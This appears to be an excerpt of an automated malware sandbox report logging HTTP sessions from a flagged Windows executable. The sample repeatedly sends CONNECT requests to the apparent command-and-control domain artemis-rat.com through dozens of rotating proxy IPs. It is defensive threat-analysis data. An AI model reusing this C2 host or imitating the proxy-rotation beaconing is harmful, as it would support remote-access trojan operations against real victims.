                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.645600080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:18.296272039 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              544192.168.2.45179843.157.47.74437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.304656982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              545192.168.2.45094947.242.234.237807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.312777996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              546192.168.2.45161138.162.11.8731287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.314224005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.733534098 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              547192.168.2.451666104.16.230.163807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.318698883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.474073887 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              548192.168.2.451601174.64.199.7941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.324325085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              549192.168.2.45162138.162.0.17131287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.328046083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.763889074 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              550192.168.2.451681172.67.182.153807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.335452080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.489867926 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              551192.168.2.451592121.182.138.71807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.342139959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              552192.168.2.451693104.24.193.186807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.345314980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.499356985 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              553192.168.2.451698185.238.228.240807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.348088980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.502408028 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              554192.168.2.45170545.14.174.148807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.351080894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.505418062 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              555192.168.2.4515935.196.111.30200607284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.357923985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              556192.168.2.451719104.16.81.76807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.361716986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.525166988 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              557192.168.2.451011184.181.217.21041457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.372996092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              558192.168.2.45164374.119.144.6041457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.375617027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              559192.168.2.4517015.78.65.91807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.381999016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.581912994 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              560192.168.2.450770199.102.107.14541457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.384042025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              561192.168.2.451737185.162.231.226807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.390814066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.546346903 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              562192.168.2.451746104.22.14.48807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.394083023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.548311949 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              563192.168.2.450984171.250.218.11310807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.432718039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              564192.168.2.45166172.206.181.97649437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.436094046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              565192.168.2.451664184.181.217.19441457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.437881947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              566192.168.2.45162714.103.24.14880007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.438323975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              567192.168.2.451596103.200.135.22941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.439116001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              568192.168.2.45102562.171.169.37584027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.443521976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.553890944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.570425034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.569746017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.569386005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:55.569417953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:07.585113049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:31.584975004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
